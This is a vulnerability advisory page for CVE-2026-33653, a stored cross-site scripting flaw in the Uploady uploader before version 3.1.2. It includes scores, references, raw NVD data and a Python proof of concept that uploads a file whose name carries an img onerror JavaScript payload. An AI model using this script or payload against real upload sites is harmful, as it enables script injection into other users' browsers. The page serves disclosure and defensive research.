CVE-2026-33653

Description

Ulloady is a file uploader script with multi-file upload support. A Stored Cross-Site Scripting (XSS) vulnerability exists in versions prior to 3.1.2 due to improper sanitization of filenames during the file upload process. An attacker can upload a file with a malicious filename containing JavaScript code, which is later rendered in the application without proper escaping. When the filename is displayed in the file list or file details page, the malicious script executes in the browser of any user who views the page. Version 3.1.2 fixes the issue.

CVSS Details

CVSS Score

4.6

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:farisc0de:uploady:*:*:*:*:*:*:*:* - VULNERABLE

Uploady < 3.1.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit_uploady_xss(target_url):
    """
    PoC for CVE-2026-33653 (Stored XSS in Uploady)
    This script uploads a file with a malicious filename to trigger XSS.
    """
    upload_endpoint = f"{target_url}/upload" # Adjust endpoint based on actual install
    
    # Construct a malicious filename containing JavaScript
    # Using <img> tag often bypasses simple filters and is effective for PoC
    malicious_filename = "<img src=x onerror=alert('XSS')>.png"
    
    # Create a dummy file content
    files = {
        'file': (malicious_filename, b'dummy content', 'image/png')
    }
    
    try:
        response = requests.post(upload_endpoint, files=files)
        if response.status_code == 200:
            print(f"[+] File uploaded successfully. Visit the file list page at {target_url} to verify XSS.")
        else:
            print(f"[-] Upload failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://localhost:8080"
    exploit_uploady_xss(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33653
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33653
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33653/
[4] VulDB https://vuldb.com/cve/CVE-2026-33653
[5] https://github.com/farisc0de/Uploady/commit/e4b4dbec0b45304b5ab01e36a1003d0c7cc613d5
[6] https://github.com/farisc0de/Uploady/releases/tag/v3.1.2
[7] https://github.com/farisc0de/Uploady/security/advisories/GHSA-2834-m7xm-fqr5

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33653", "sourceIdentifier": "[email protected]", "published": "2026-03-26T22:16:29.220", "lastModified": "2026-04-10T14:27:58.470", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ulloady is a file uploader script with multi-file upload support. A Stored Cross-Site Scripting (XSS) vulnerability exists in versions prior to 3.1.2 due to improper sanitization of filenames during the file upload process. An attacker can upload a file with a malicious filename containing JavaScript code, which is later rendered in the application without proper escaping. When the filename is displayed in the file list or file details page, the malicious script executes in the browser of any user who views the page. Version 3.1.2 fixes the issue."}, {"lang": "es", "value": "Ulloady es un script de carga de archivos con soporte para carga de múltiples archivos. Una vulnerabilidad de cross-site scripting (XSS) almacenado existe en versiones anteriores a la 3.1.2 debido a una sanitización inadecuada de los nombres de archivo durante el proceso de carga de archivos. Un atacante puede cargar un archivo con un nombre de archivo malicioso que contiene código JavaScript, el cual luego se renderiza en la aplicación sin el escape adecuado. Cuando el nombre de archivo se muestra en la lista de archivos o en la página de detalles del archivo, el script malicioso se ejecuta en el navegador de cualquier usuario que ve la página. La versión 3.1.2 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:farisc0de:uploady:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.1.2", "matchCriteriaId": "6F48E1F2-1F58-4FF9-B8F0-1AFFE0182D5E"}]}]}], "references": [{"url": "https://github.com/farisc0de/Uploady/commit/e4b4dbec0b45304b5ab01e36a1003d0c7cc613d5", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/farisc0de/Uploady/releases/tag/v3.1.2", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/farisc0de/Uploady/security/advisories/GHSA-2834-m7xm-fqr5", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}